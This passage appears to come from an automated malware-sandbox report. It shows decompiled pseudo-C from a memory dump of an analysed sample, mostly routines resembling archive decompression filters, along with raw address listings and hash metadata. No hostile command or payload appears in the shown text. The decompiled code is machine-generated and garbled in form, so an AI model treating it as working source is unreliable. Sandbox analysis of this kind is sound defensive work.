										}
									}
								}
								__eflags =  *(_t440 + 0x4ad8) - 1;
								if( *(_t440 + 0x4ad8) <= 1) {
									L34:
									 *_t295 =  *_t295 & 0x00000000;
									_t295[2] = _t324;
									_t295[1] = 0;
									goto L33;
								}
								__eflags =  *(_t295 - 0xc);
								if( *(_t295 - 0xc) != 0) {
									goto L34;
								}
								_t279 =  *(_t295 - 8) & 0x0000ffff;
								_t435 = 3;
								__eflags = _t279 - _t435;
								if(_t279 >= _t435) {
									goto L34;
								}
								_t280 = _t279 + 1;
								 *(_t295 - 8) = _t280;
								 *((_t280 & 0x0000ffff) + _t295 - 4) = _t324;
								_t68 = _t440 + 0x4ad8;
								 *_t68 =  *(_t440 + 0x4ad8) - 1;
								__eflags =  *_t68;
								goto L33;
							}
						}
					}
					 *((char*)(_t440 + 0x4ad0)) = 1;
					goto L94;
				} else {
					 *((char*)(_t440 + 0x2c)) = 1;
					_push(_t440 + 0x30);
					_push(_t440 + 0x18);
					_push(_t440 + 4);
					_t291 = E00E73FAE(__ecx);
					if(_t291 != 0) {
						goto L3;
					} else {
						 *((char*)(_t440 + 0x4ad0)) = 1;
						return _t291;
					}
				}
			}

0x00e76cc1
0x00e76cc7
0x00e76ccf
0x00e76cf6
0x00e76cf9
0x00e76cff
0x00e76d02
0x00e76d04
0x00e76d1c
0x00e76d23
0x00e76d25
0x00e76d28
0x00e76d2c
0x00e76d31
0x00e76d33
0x00e76d35
0x00e76d37
0x00e76d37
0x00e76d39
0x00e76d3d
0x00e76d3d
0x00e76d3f
0x00e76d41
0x00000000
0x00000000
0x00e76d43
0x00e76d43
0x00e76d45
0x00e772bc
0x00e772bd
0x00000000
0x00e772bd
0x00e76d4b
0x00e76d59
0x00e76d59
0x00e76d5b
0x00e76d6a
0x00e76d6a
0x00e76d70
0x00e772b5
0x00e772b5
0x00000000
0x00e772b5
0x00000000
0x00e76d70
0x00e76d5d
0x00e76d64
0x00000000
0x00000000
0x00000000
0x00e76d64
0x00e76d4d
0x00e76d50
0x00e76d53
0x00000000
0x00000000
0x00000000
0x00e76d76
0x00e76d76
0x00e76d7f
0x00e76d85
0x00e76d87
0x00e76d8a
0x00e76d93
0x00e76d94
0x00e76d9f
0x00e76da3
0x00e76da5
0x00e76dac
0x00e76dac
0x00e76db1
0x00e76db1
0x00e76db7
0x00e76dc2
0x00e76dc9
0x00e76dcd
0x00e76dd3
0x00e76dda
0x00e76de0
0x00e76de6
0x00e76dea
0x00e76e17
0x00e76e18
0x00e76e19
0x00e76e1b
0x00e76e34
0x00e76e37
0x00e76e3e
0x00e76e41
0x00e76e44
0x00e76e4c
0x00e76e55
0x00e76e59
0x00e76e5b
0x00e76e5e
0x00e76e60
0x00e76e60
0x00e76e62
0x00000000
0x00e76e62
0x00e76e20
0x00e76e23
0x00e76e23
0x00e76e25
0x00000000
0x00000000
0x00e76e27
0x00e76e28
0x00e76e2b
0x00e76e2e
0x00000000
0x00000000
0x00000000
0x00e76e30
0x00e76e32
0x00000000
0x00e76dec
0x00e76dee
0x00e76df1
0x00e76dfb
0x00e76e03
0x00e76e08
0x00e76e0b
0x00e76e6a
0x00e76e6f
0x00e76e71
0x00e76ebf
0x00e76ec5
0x00e77138
0x00e7713a
0x00e7718b
0x00e77191
0x00e771a0
0x00e771a1
0x00e771ab
0x00e771ae
0x00e771b5
0x00e771bb
0x00e771c1
0x00e771c8
0x00e771f5
0x00e771f6
0x00e771f7
0x00e771f9
0x00e77215
0x00e77218
0x00e7721f
0x00e77222
0x00e77225
0x00e77230
0x00e7723c
0x00e7723e
0x00e77244
0x00e77246
0x00e77246
0x00e77248
0x00e77250
0x00e77250
0x00e77253
0x00e77256
0x00e77264
0x00e77267
0x00e7726f
0x00e77272
0x00e77274
0x00e77278
0x00e7727f
0x00e77287
0x00e77289
0x00e77290
0x00e77292
0x00e77292
0x00e77295
0x00e77295
0x00e77258
0x00e77258
0x00e77258
0x00e7729c
0x00e772a0
0x00e772a0
0x00e772a4
0x00e772a8
0x00e772ac
0x00e76d3d
0x00e76d3d
0x00e76d3f
0x00e76d41
0x00000000
0x00000000
0x00000000
0x00e76d41
0x00e76d3d
0x00e77201
0x00e77204
0x00e77204
0x00e77206
0x00000000
0x00000000
0x00e77208
0x00e77209
0x00e7720c
0x00e7720f
0x00000000
0x00000000
0x00000000
0x00e77211
0x00e77213
0x00000000
0x00e77213
0x00e771cc
0x00e771cf
0x00e771d9
0x00e771e1
0x00e771e6
0x00e771e9
0x00000000
0x00e771e9
0x00e77193
0x00e76ea0
0x00e76ea0
0x00e76ea4
0x00e76ea8
0x00000000
0x00e76ea8
0x00e77142
0x00e77144
0x00e7714e
0x00e77156
0x00e7715b
0x00e7715c
0x00e7715e
0x00e77167
0x00e7716e
0x00e77179
0x00e77181
0x00e77183
0x00000000
0x00e77183
0x00e76ecb
0x00e76ed1
0x00e76ed4
0x00e76ee1
0x00e76ee4
0x00e76eea
0x00e76eea
0x00e76ed6
0x00e76ed6
0x00e76ed6
0x00e76eec
0x00e76eef
0x00e76ef3
0x00e76ef5
0x00e76ef9
0x00e76f00
0x00e76f0a
0x00e76f0c
0x00e76f15
0x00e76f17
0x00e76f17
0x00e76f1a
0x00e76f1a
0x00e76f1f
0x00e76f26
0x00e76f2c
0x00e76f32
0x00e76f39
0x00e76f66
0x00e76f67
0x00e76f68
0x00e76f6a
0x00e76f86
0x00e76f89
0x00e76f90
0x00e76f93
0x00e76f96
0x00e76fa1
0x00e76fad
0x00e76faf
0x00e76fb5
0x00e76fb7
0x00e76fb7
0x00e76fb9
0x00000000
0x00e76fb9
0x00e76f72
0x00e76f75
0x00e76f75
0x00e76f77
0x00000000
0x00000000
0x00e76f79
0x00e76f7a
0x00e76f7d
0x00e76f80
0x00000000
0x00000000
0x00000000
0x00e76f82
0x00e76f84
0x00000000
0x00e76f3b
0x00e76f3d
0x00e76f40
0x00e76f4a
0x00e76f52
0x00e76f57
0x00e76f5a
0x00e76fc1
0x00e76fc1
0x00e76fc4
0x00e76fc7
0x00e76fd7
0x00e76fda
0x00e76fda
0x00e76fc9
0x00e76fc9
0x00e76fc9
0x00e76fdc
0x00e76fdd
0x00e76fe1
0x00e76fe3
0x00e76fe5
0x00e770f3
0x00e770f3
0x00e770f9
0x00e770ff
0x00e77100
0x00e77104
0x00e7710a
0x00e7710c
0x00e7710d
0x00e77111
0x00e77117
0x00e77119
0x00e77119
0x00e7711a
0x00e7711a
0x00e77117
0x00e7710a
0x00e7711e
0x00e77126
0x00e7712c
0x00e77130
0x00000000
0x00e76feb
0x00e76feb
0x00e76fee
0x00e770cf
0x00e770d8
0x00e770e0
0x00e770e4
0x00e770eb
0x00e770ed
0x00e770ed
0x00e770f0
0x00000000
0x00e770f0
0x00e76ff4
0x00e76ff8
0x00e77001
0x00e7700f
0x00e77013
0x00e7701a
0x00e7701c
0x00e7701c
0x00e7701f
0x00e7701f
0x00e77024
0x00e7702b
0x00e77031
0x00e77037
0x00e7703e
0x00e7706b
0x00e7706c
0x00e7706d
0x00e7706f
0x00e7708b
0x00e7708e
0x00e77095
0x00e77098
0x00e7709b
0x00e770a6
0x00e770b2
0x00e770b4
0x00e770ba
0x00e770bc
0x00e770bc
0x00e770be
0x00000000
0x00e770be
0x00e77077
0x00e7707a
0x00e7707a
0x00e7707c
0x00000000
0x00000000
0x00e7707e
0x00e7707f
0x00e77082
0x00e77085
0x00000000
0x00000000
0x00000000
0x00e77087
0x00e77089
0x00000000
0x00e77040
0x00e77042
0x00e77045
0x00e7704f
0x00e77057
0x00e7705c
0x00e7705f
0x00e770c6
0x00e770c9
0x00000000
0x00e770c9
0x00e7703e
0x00e76fe5
0x00e76f39
0x00e76e73
0x00e76e7a
0x00e76eb1
0x00e76eb1
0x00e76eb6
0x00e76eb9
0x00000000
0x00e76eb9
0x00e76e7c
0x00e76e80
0x00000000
0x00000000
0x00e76e82
0x00e76e88
0x00e76e89
0x00e76e8c
0x00000000
0x00000000
0x00e76e8e
0x00e76e8f
0x00e76e96
0x00e76e9a
0x00e76e9a
0x00e76e9a
0x00000000
0x00e76e9a
0x00e76dea
0x00e76d3d
0x00e76d06
0x00000000
0x00e76cd1
0x00e76cd4
0x00e76cd8
0x00e76cdc
0x00e76ce0
0x00e76ce1
0x00e76ce8
0x00000000
0x00e76cea
0x00e76cea
0x00000000
0x00e76cea
0x00e76ce8

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24b1407c67086ea9d1a645da1294f11b61841d1e20ad948004f1ca87f965ec49
Instruction ID: a1e30bf3c58c152197cfcbb8d7c1eb5d0f1c41adeca3ed13a9454c52c590adec
Opcode Fuzzy Hash: 24b1407c67086ea9d1a645da1294f11b61841d1e20ad948004f1ca87f965ec49
Instruction Fuzzy Hash: BB12E3B1704B028BC728CF28D8D07B9B3E1FB54308F14992EE59BE7A81D774A894CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00E6C017 Relevance: .4, Instructions: 449
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00E6C017(signed int* __ecx) {
				void* __edi;
				signed int _t194;
				char _t197;
				void* _t204;
				signed char _t205;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				intOrPtr _t219;
				signed int _t221;
				signed int _t223;
				void* _t234;
				signed int _t235;
				signed int _t238;
				signed int _t266;
				void* _t267;
				void* _t268;
				void* _t269;
				void* _t270;
				void* _t271;
				signed int _t274;
				intOrPtr _t275;
				void* _t276;
				signed char* _t277;
				signed int _t278;
				signed int _t279;
				signed int _t281;
				char _t282;
				signed int _t284;
				signed char _t285;
				signed char _t289;
				void* _t290;
				intOrPtr _t292;
				signed int _t293;
				signed char* _t297;
				signed int _t304;
				signed int _t306;
				signed int _t308;
				signed int _t309;
				signed char _t310;
				intOrPtr _t311;
				void* _t312;
				void* _t313;
				unsigned int _t316;
				signed int _t317;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed char _t323;
				signed int _t324;
				signed int _t325;
				void* _t326;
				void* _t327;
				void* _t328;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed char* _t334;
				signed int _t335;
				signed int _t336;
				signed int _t338;
				unsigned int _t340;
				signed int _t345;
				void* _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				void* _t354;
				void* _t355;

				_t311 =  *((intOrPtr*)(_t355 + 4));
				_t339 = __ecx;
				if(_t311 <= 0) {
					L15:
					return 1;
				}
				if(_t311 <= 2) {
					_t194 = __ecx[5];
					_t284 =  *__ecx;
					_t340 = __ecx[7];
					_t276 = _t194 - 4;
					if(_t276 > 0x3fffc) {
						L98:
						return 0;
					}
					_t326 = 0;
					_t197 = (_t194 & 0xffffff00 | _t311 == 0x00000002) + 0xe8;
					 *((char*)(_t355 + 0x13)) = _t197;
					if(_t276 == 0) {
						goto L15;
					} else {
						goto L88;
					}
					do {
						L88:
						_t312 =  *_t284;
						_t284 = _t284 + 1;
						_t327 = _t326 + 1;
						_t340 = _t340 + 1;
						if(_t312 == 0xe8 || _t312 == _t197) {
							_t313 =  *_t284;
							if(_t313 >= 0) {
								_t191 = _t313 - 0x1000000; // -16777215
								if(_t191 < 0) {
									 *_t284 = _t313 - _t340;
								}
							} else {
								if(_t340 + _t313 >= 0) {
									_t190 = _t313 + 0x1000000; // 0x1000001
									 *_t284 = _t190;
								}
							}
							_t197 =  *((intOrPtr*)(_t355 + 0x13));
							_t284 = _t284 + 4;
							_t326 = _t327 + 4;
							_t340 = _t340 + 4;
						}
					} while (_t326 < _t276);
					goto L15;
				}
				if(_t311 == 3) {
					_t277 =  *__ecx;
					_t328 = __ecx[5] - 0x15;
					if(_t328 > 0x3ffeb) {
						goto L98;
					}
					_t316 = __ecx[7] >> 4;
					 *(_t355 + 0x2c) = _t316;
					if(_t328 == 0) {
						goto L15;
					}
					_t331 = (_t328 - 1 >> 4) + 1;
					 *(_t355 + 0x38) = _t331;
					do {
						_t204 = ( *_t277 & 0x1f) - 0x10;
						if(_t204 < 0) {
							goto L84;
						}
						_t205 =  *((intOrPtr*)(_t204 + 0xe9e070));
						if(_t205 == 0) {
							goto L84;
						}
						_t332 =  *(_t355 + 0x2c);
						_t285 = 0;
						_t317 = _t205 & 0x000000ff;
						 *(_t355 + 0x34) = 0;
						 *(_t355 + 0x40) = _t317;
						_t350 = 0x12;
						do {
							if((_t317 & 1) != 0) {
								_t175 = _t350 + 0x18; // 0x2a
								if(E00E6C580(_t277, _t175, 4) == 5) {
									E00E6C5CB(_t277, E00E6C580(_t277, _t350, 0x14) - _t332 & 0x000fffff, _t350, 0x14);
								}
								_t317 =  *(_t355 + 0x3c);
								_t285 =  *(_t355 + 0x30);
							}
							_t285 = _t285 + 1;
							_t350 = _t350 + 0x29;
							 *(_t355 + 0x30) = _t285;
						} while (_t350 <= 0x64);
						_t331 =  *(_t355 + 0x38);
						_t316 =  *(_t355 + 0x2c);
						L84:
						_t277 =  &(_t277[0x10]);
						_t316 = _t316 + 1;
						_t331 = _t331 - 1;
						 *(_t355 + 0x2c) = _t316;
						 *(_t355 + 0x38) = _t331;
					} while (_t331 != 0);
					goto L15;
				}
				if(_t311 == 4) {
					_t215 = __ecx[1];
					_t289 = __ecx[5];
					_t333 = __ecx[2];
					 *(_t355 + 0x20) = _t215;
					_t278 = _t215 - 3;
					 *(_t355 + 0x30) = _t289;
					 *(_t355 + 0x3c) = _t278;
					 *(_t355 + 0x44) = _t333;
					if(_t289 - 3 > 0x1fffd || _t278 > _t289 || _t333 > 2) {
						goto L98;
					} else {
						_t217 =  *__ecx;
						 *(_t355 + 0x2c) = _t217;
						_t351 = _t217 + _t289;
						_t218 = 0;
						 *(_t355 + 0x18) = _t351;
						_t319 = _t351 - _t278;
						 *(_t355 + 0x24) = 0;
						 *(_t355 + 0x14) = _t319;
						do {
							_t279 = 0;
							if(_t218 >= _t289) {
								goto L67;
							}
							_t334 = _t319 + _t218;
							_t320 =  *(_t355 + 0x20);
							_t221 =  *(_t355 + 0x3c) - _t351;
							_t352 =  *(_t355 + 0x3c);
							 *(_t355 + 0x28) = _t221;
							do {
								if( &(_t334[_t221]) >= _t320) {
									_t227 =  *_t334 & 0x000000ff;
									_t291 =  *(_t334 - 3) & 0x000000ff;
									 *(_t355 + 0x38) =  *_t334 & 0x000000ff;
									 *(_t355 + 0x34) =  *(_t334 - 3) & 0x000000ff;
									 *(_t355 + 0x44) = E00E85BBA(_t320, _t227 - _t291 + _t279 - _t279);
									 *(_t355 + 0x28) = E00E85BBA(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x3c));
									_t234 = E00E85BBA(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x3c));
									_t292 =  *((intOrPtr*)(_t355 + 0x4c));
									_t355 = _t355 + 0xc;
									_t321 =  *(_t355 + 0x1c);
									if(_t292 > _t321 || _t292 > _t234) {
										_t289 =  *(_t355 + 0x30);
										_t320 =  *(_t355 + 0x20);
										_t279 =  *(_t355 + 0x38);
										if(_t321 > _t234) {
											_t279 =  *(_t355 + 0x34);
										}
									} else {
										_t289 =  *(_t355 + 0x30);
										_t320 =  *(_t355 + 0x20);
									}
								}
								_t223 =  *(_t355 + 0x2c);
								_t279 = _t279 -  *_t223 & 0x000000ff;
								 *(_t355 + 0x2c) = _t223 + 1;
								_t334[_t352] = _t279;
								_t334 =  &(_t334[3]);
								_t221 =  *(_t355 + 0x28);
							} while ( &(_t334[ *(_t355 + 0x28)]) < _t289);
							_t351 =  *(_t355 + 0x18);
							_t218 =  *(_t355 + 0x24);
							_t319 =  *(_t355 + 0x14);
							L67:
							_t218 = _t218 + 1;
							 *(_t355 + 0x24) = _t218;
						} while (_t218 < 3);
						_t335 =  *(_t355 + 0x44);
						_t290 = _t289 + 0xfffffffe;
						while(_t335 < _t290) {
							_t219 =  *((intOrPtr*)(_t335 + _t351 + 1));
							 *((intOrPtr*)(_t335 + _t351)) =  *((intOrPtr*)(_t335 + _t351)) + _t219;
							 *((intOrPtr*)(_t335 + _t351 + 2)) =  *((intOrPtr*)(_t335 + _t351 + 2)) + _t219;
							_t335 = _t335 + 3;
						}
						goto L15;
					}
				}
				if(_t311 == 5) {
					_t235 = __ecx[5];
					_t293 =  *__ecx;
					_t281 = __ecx[1];
					 *(_t355 + 0x34) = _t293;
					 *(_t355 + 0x38) = _t235;
					 *(_t355 + 0x40) = _t293 + _t235;
					if(_t235 > 0x20000 || _t281 > 0x80 || _t281 == 0) {
						goto L98;
					} else {
						_t336 = 0;
						 *(_t355 + 0x3c) = 0;
						if(_t281 == 0) {
							goto L15;
						} else {
							goto L21;
						}
						do {
							L21:
							 *(_t355 + 0x28) =  *(_t355 + 0x28) & 0x00000000;
							 *(_t355 + 0x24) =  *(_t355 + 0x24) & 0x00000000;
							_t345 = 0;
							 *(_t355 + 0x20) =  *(_t355 + 0x20) & 0x00000000;
							_t353 = 0;
							 *(_t355 + 0x1c) =  *(_t355 + 0x1c) & 0x00000000;
							 *(_t355 + 0x14) =  *(_t355 + 0x14) & 0;
							 *(_t355 + 0x24) = 0;
							E00E7F5F0(_t336, _t355 + 0x48, 0, 0x1c);
							 *(_t355 + 0x3c) =  *(_t355 + 0x3c) & 0;
							_t355 = _t355 + 0xc;
							 *(_t355 + 0x2c) = _t336;
							if(_t336 <  *(_t355 + 0x38)) {
								_t238 =  *(_t355 + 0x14);
								do {
									_t322 =  *(_t355 + 0x24);
									 *(_t355 + 0x1c) = _t322 -  *(_t355 + 0x20);
									_t297 =  *(_t355 + 0x34);
									 *(_t355 + 0x20) = _t322;
									_t323 =  *_t297 & 0x000000ff;
									 *(_t355 + 0x34) =  &(_t297[1]);
									_t304 = ( *(_t355 + 0x1c) * _t238 + _t345 *  *(_t355 + 0x1c) + _t353 *  *(_t355 + 0x24) +  *(_t355 + 0x28) * 0x00000008 >> 0x00000003 & 0x000000ff) - _t323;
									 *( *(_t355 + 0x2c) +  *(_t355 + 0x40)) = _t304;
									_t349 = _t323 << 3;
									 *(_t355 + 0x28) = _t304 -  *(_t355 + 0x28);
									 *(_t355 + 0x2c) = _t304;
									 *((intOrPtr*)(_t355 + 0x4c)) =  *((intOrPtr*)(_t355 + 0x4c)) + E00E85BBA(_t323, _t323 << 3);
									 *((intOrPtr*)(_t355 + 0x54)) =  *((intOrPtr*)(_t355 + 0x54)) + E00E85BBA(_t323, (_t323 << 3) -  *(_t355 + 0x24));
									 *((intOrPtr*)(_t355 + 0x5c)) =  *((intOrPtr*)(_t355 + 0x5c)) + E00E85BBA(_t323,  *(_t355 + 0x28) + (_t323 << 3));
									 *((intOrPtr*)(_t355 + 0x64)) =  *((intOrPtr*)(_t355 + 0x64)) + E00E85BBA(_t323, (_t323 << 3) -  *(_t355 + 0x28));
									 *((intOrPtr*)(_t355 + 0x6c)) =  *((intOrPtr*)(_t355 + 0x6c)) + E00E85BBA(_t323,  *(_t355 + 0x2c) + _t349);
									 *((intOrPtr*)(_t355 + 0x74)) =  *((intOrPtr*)(_t355 + 0x74)) + E00E85BBA(_t323, _t349 -  *(_t355 + 0x1c));
									 *((intOrPtr*)(_t355 + 0x7c)) =  *((intOrPtr*)(_t355 + 0x7c)) + E00E85BBA(_t323, _t349 +  *(_t355 + 0x1c));
									_t355 = _t355 + 0x1c;
									if(( *(_t355 + 0x30) & 0x0000001f) != 0) {
										_t345 =  *(_t355 + 0x18);
										_t238 =  *(_t355 + 0x14);
									} else {
										_t324 =  *(_t355 + 0x48);
										_t266 = 0;
										 *(_t355 + 0x48) =  *(_t355 + 0x48) & 0;
										_t308 = 1;
										do {
											if( *(_t355 + 0x48 + _t308 * 4) < _t324) {
												_t324 =  *(_t355 + 0x48 + _t308 * 4);
												_t266 = _t308;
											}
											 *(_t355 + 0x48 + _t308 * 4) =  *(_t355 + 0x48 + _t308 * 4) & 0x00000000;
											_t308 = _t308 + 1;
										} while (_t308 < 7);
										_t345 =  *(_t355 + 0x18);
										_t267 = _t266 - 1;
										if(_t267 == 0) {
											_t238 =  *(_t355 + 0x14);
											if(_t353 >= 0xfffffff0) {
												_t353 = _t353 - 1;
											}
											goto L49;
										}
										_t268 = _t267 - 1;
										if(_t268 == 0) {
											_t238 =  *(_t355 + 0x14);
											if(_t353 < 0x10) {
												_t353 = _t353 + 1;
											}
											goto L49;
										}
										_t269 = _t268 - 1;
										if(_t269 == 0) {
											_t238 =  *(_t355 + 0x14);
											if(_t345 < 0xfffffff0) {
												goto L49;
											}
											_t345 = _t345 - 1;
											L43:
											 *(_t355 + 0x18) = _t345;
											goto L49;
										}
										_t270 = _t269 - 1;
										if(_t270 == 0) {
											_t238 =  *(_t355 + 0x14);
											if(_t345 >= 0x10) {
												goto L49;
											}
											_t345 = _t345 + 1;
											goto L43;
										}
										_t271 = _t270 - 1;
										if(_t271 == 0) {
											_t238 =  *(_t355 + 0x14);
											if(_t238 < 0xfffffff0) {
												goto L49;
											}
											_t238 = _t238 - 1;
											L36:
											 *(_t355 + 0x14) = _t238;
											goto L49;
										}
										_t238 =  *(_t355 + 0x14);
										if(_t271 != 1 || _t238 >= 0x10) {
											goto L49;
										} else {
											_t238 = _t238 + 1;
											goto L36;
										}
									}
									L49:
									_t306 =  *(_t355 + 0x2c) + _t281;
									 *(_t355 + 0x30) =  *(_t355 + 0x30) + 1;
									 *(_t355 + 0x2c) = _t306;
								} while (_t306 <  *(_t355 + 0x38));
								_t336 =  *(_t355 + 0x3c);
							}
							_t336 = _t336 + 1;
							 *(_t355 + 0x3c) = _t336;
						} while (_t336 < _t281);
						goto L15;
					}
				}
				if(_t311 != 6) {
					goto L15;
				}
				_t309 = __ecx[5];
				_t354 = 0;
				_t325 = __ecx[1];
				 *(_t355 + 0x2c) = _t309;
				 *(_t355 + 0x30) = _t309 + _t309;
				if(_t309 > 0x20000 || _t325 > 0x400 || _t325 == 0) {
					goto L98;
				} else {
					_t274 = _t325;
					 *(_t355 + 0x28) = _t325;
					do {
						_t282 = 0;
						_t338 = _t309;
						if(_t309 <  *(_t355 + 0x30)) {
							_t310 =  *(_t355 + 0x30);
							goto L12;
							L12:
							_t275 =  *_t339;
							_t282 = _t282 -  *((intOrPtr*)(_t275 + _t354));
							_t354 = _t354 + 1;
							 *((char*)(_t275 + _t338)) = _t282;
							_t338 = _t338 + _t325;
							if(_t338 < _t310) {
								goto L12;
							} else {
								_t309 =  *(_t355 + 0x2c);
								_t274 =  *(_t355 + 0x28);
								goto L14;
							}
						}
						L14:
						_t309 = _t309 + 1;
						_t274 = _t274 - 1;
						 *(_t355 + 0x2c) = _t309;
						 *(_t355 + 0x28) = _t274;
					} while (_t274 != 0);
					goto L15;
				}
			}

0x00e6c017
0x00e6c021
0x00e6c026
0x00e6c0bd
0x00000000
0x00e6c0bd
0x00e6c02f
0x00e6c507
0x00e6c50a
0x00e6c50c
0x00e6c50f
0x00e6c518
0x00e6c579
0x00000000
0x00e6c579
0x00e6c520
0x00e6c522
0x00e6c524
0x00e6c52a
0x00000000
0x00000000
0x00000000
0x00000000
0x00e6c530
0x00e6c530
0x00e6c530
0x00e6c532
0x00e6c533
0x00e6c534
0x00e6c538
0x00e6c53e
0x00e6c542
0x00e6c555
0x00e6c55d
0x00e6c561
0x00e6c561
0x00e6c544
0x00e6c549
0x00e6c54b
0x00e6c551
0x00e6c551
0x00e6c549
0x00e6c563
0x00e6c567
0x00e6c56a
0x00e6c56d
0x00e6c56d
0x00e6c570
0x00000000
0x00e6c574
0x00e6c038
0x00e6c441
0x00e6c443
0x00e6c44c
0x00000000
0x00000000
0x00e6c455
0x00e6c458
0x00e6c45e
0x00000000
0x00000000
0x00e6c468
0x00e6c469
0x00e6c46d
0x00e6c473
0x00e6c476
0x00000000
0x00000000
0x00e6c478
0x00e6c480
0x00000000
0x00000000
0x00e6c482
0x00e6c486
0x00e6c488
0x00e6c48d
0x00e6c491
0x00e6c495
0x00e6c496
0x00e6c49d
0x00e6c4a1
0x00e6c4b0
0x00e6c4cb
0x00e6c4cb
0x00e6c4d0
0x00e6c4d4
0x00e6c4d4
0x00e6c4d8
0x00e6c4d9
0x00e6c4dc
0x00e6c4e0
0x00e6c4e5
0x00e6c4e9
0x00e6c4ed
0x00e6c4ed
0x00e6c4f0
0x00e6c4f1
0x00e6c4f4
0x00e6c4f8
0x00e6c4f8
0x00000000
0x00e6c502
0x00e6c041
0x00e6c2f5
0x00e6c2f8
0x00e6c2fb
0x00e6c2fe
0x00e6c302
0x00e6c305
0x00e6c30c
0x00e6c310
0x00e6c319
0x00000000
0x00e6c330
0x00e6c330
0x00e6c332
0x00e6c336
0x00e6c339
0x00e6c33d
0x00e6c341
0x00e6c343
0x00e6c347
0x00e6c34b
0x00e6c34b
0x00e6c34f
0x00000000
0x00000000
0x00e6c355
0x00e6c35c
0x00e6c360
0x00e6c362
0x00e6c366
0x00e6c36a
0x00e6c36e
0x00e6c370
0x00e6c373
0x00e6c37b
0x00e6c381
0x00e6c38f
0x00e6c3a4
0x00e6c3a8
0x00e6c3ad
0x00e6c3b1
0x00e6c3b4
0x00e6c3ba
0x00e6c3ca
0x00e6c3d0
0x00e6c3d4
0x00e6c3d8
0x00e6c3da
0x00e6c3da
0x00e6c3c0
0x00e6c3c0
0x00e6c3c4
0x00e6c3c4
0x00e6c3ba
0x00e6c3de
0x00e6c3e5
0x00e6c3e8
0x00e6c3f0
0x00e6c3f3
0x00e6c3fa
0x00e6c3fa
0x00e6c404
0x00e6c408
0x00e6c40c
0x00e6c410
0x00e6c410
0x00e6c411
0x00e6c415
0x00e6c41e
0x00e6c422
0x00e6c435
0x00e6c427
0x00e6c42b
0x00e6c42e
0x00e6c432
0x00e6c432
0x00000000
0x00e6c439
0x00e6c319
0x00e6c04a
0x00e6c0c9
0x00e6c0cc
0x00e6c0ce
0x00e6c0d1
0x00e6c0d7
0x00e6c0db
0x00e6c0e4
0x00000000
0x00e6c0fe
0x00e6c0fe
0x00e6c100
0x00e6c106
0x00000000
0x00000000
0x00000000
0x00000000
0x00e6c108
0x00e6c108
0x00e6c108
0x00e6c111
0x00e6c116
0x00e6c118
0x00e6c11d
0x00e6c11f
0x00e6c124
0x00e6c12c
0x00e6c130
0x00e6c135
0x00e6c139
0x00e6c13c
0x00e6c144
0x00e6c14a
0x00e6c14e
0x00e6c14e
0x00e6c15c
0x00e6c160
0x00e6c169
0x00e6c16d
0x00e6c171
0x00e6c19a
0x00e6c19c
0x00e6c1ab
0x00e6c1af
0x00e6c1b3
0x00e6c1bc
0x00e6c1cc
0x00e6c1dc
0x00e6c1ec
0x00e6c1fc
0x00e6c20a
0x00e6c217
0x00e6c21b
0x00e6c223
0x00e6c2bf
0x00e6c2c3
0x00e6c229
0x00e6c229
0x00e6c22d
0x00e6c22f
0x00e6c235
0x00e6c236
0x00e6c23a
0x00e6c23c
0x00e6c240
0x00e6c240
0x00e6c242
0x00e6c247
0x00e6c248
0x00e6c24d
0x00e6c251
0x00e6c254
0x00e6c2b3
0x00e6c2ba
0x00e6c2bc
0x00e6c2bc
0x00000000
0x00e6c2ba
0x00e6c256
0x00e6c259
0x00e6c2a7
0x00e6c2ae
0x00e6c2b0
0x00e6c2b0
0x00000000
0x00e6c2ae
0x00e6c25b
0x00e6c25e
0x00e6c297
0x00e6c29e
0x00000000
0x00000000
0x00e6c2a0
0x00e6c2a1
0x00e6c2a1
0x00000000
0x00e6c2a1
0x00e6c260
0x00e6c263
0x00e6c28b
0x00e6c292
0x00000000
0x00000000
0x00e6c294
0x00000000
0x00e6c294
0x00e6c265
0x00e6c268
0x00e6c27f
0x00e6c286
0x00000000
0x00000000
0x00e6c288
0x00e6c279
0x00e6c279
0x00000000
0x00e6c279
0x00e6c26d
0x00e6c271
0x00000000
0x00e6c278
0x00e6c278
0x00000000
0x00e6c278
0x00e6c271
0x00e6c2c7
0x00e6c2cb
0x00e6c2cd
0x00e6c2d1
0x00e6c2d5
0x00e6c2df
0x00e6c2df
0x00e6c2e3
0x00e6c2e4
0x00e6c2e8
0x00000000
0x00e6c2f0
0x00e6c0e4
0x00e6c04f
0x00000000
0x00000000
0x00e6c051
0x00e6c054
0x00e6c056
0x00e6c059
0x00e6c060
0x00e6c06a
0x00000000
0x00e6c084
0x00e6c084
0x00e6c086
0x00e6c08a
0x00e6c08a
0x00e6c08c
0x00e6c092
0x00e6c094
0x00e6c094
0x00e6c098
0x00e6c098
0x00e6c09a
0x00e6c09d
0x00e6c09e
0x00e6c0a1
0x00e6c0a5
0x00000000
0x00e6c0a7
0x00e6c0a7
0x00e6c0ab
0x00000000
0x00e6c0ab
0x00e6c0a5
0x00e6c0af
0x00e6c0af
0x00e6c0b0
0x00e6c0b3
0x00e6c0b7
0x00e6c0b7
0x00000000
0x00e6c08a

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

